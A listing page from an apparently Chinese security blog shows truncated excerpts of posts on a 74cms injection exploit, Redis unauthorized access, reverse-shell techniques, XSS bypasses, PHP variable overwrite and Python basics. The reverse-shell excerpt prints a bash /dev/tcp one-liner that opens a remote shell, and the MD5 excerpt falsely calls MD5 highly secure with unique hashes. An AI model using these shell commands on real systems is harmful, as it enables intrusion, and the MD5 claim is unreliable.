分类 技术分享 下的文章:

74cms人才系统注入+编写exp
发表于: | 分类: Python,代码审计 | 评论:0 | 阅读: 1185
0x00前言 才开始学代码审计,找一些前人的漏洞分析下 参考文章:wooyun-2014-060905 原文只指出了出现漏洞的地方,没给出利用方法,拿来分析,并给出exp 0x01代码分析 根据原文给出的代吗,找到include/fun_personal.php ...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 2700
0x01 redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1151
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=12...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1012
0x00 前言 本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家 0x01 分析 1、无安全方面的限制,直接使用 关键代码: <?php @$id = $_GET['id']; echo $id; payload: <sc...

阅读全文>>

Celery+Redis简单实现分布式爬虫
发表于: | 分类: Python | 评论:0 | 阅读: 1649
Celery官方手册:http://docs.jinkan.org/docs/celery/ 本文不再讲解Celery+Redis分布式环境搭建,具体参考官方手册 第一个程序: tasks.py: from celery import Celery app = ...

阅读全文>>

PHP变量覆盖漏洞总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1166
一、全局变量覆盖 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。 <?php echo "Register_globals: ".(int)ini_get("regi...

阅读全文>>

Python requests的安装与简单运用
发表于: | 分类: Python | 评论:0 | 阅读: 846
强烈推荐!requests官方文档已有了中文版,请见http://cn.python-requests.org/en/latest/ 。 requests是python的一个HTTP客户端库,跟urllib,urllib2类似,那为什么要用requests而不...

阅读全文>>

Python的md5和sha1加密
发表于: | 分类: Python | 评论:0 | 阅读: 951
MD5 MD5的全称是Message-Digest Algorithm 5(信息-摘要算法)。128位长度。目前MD5是一种不可逆算法。 具有很高的安全性。它对应任何字符串都可以加密成一段唯一的固定长度的代码。 SHA1 SHA1的全称是Secure Hash A...

阅读全文>>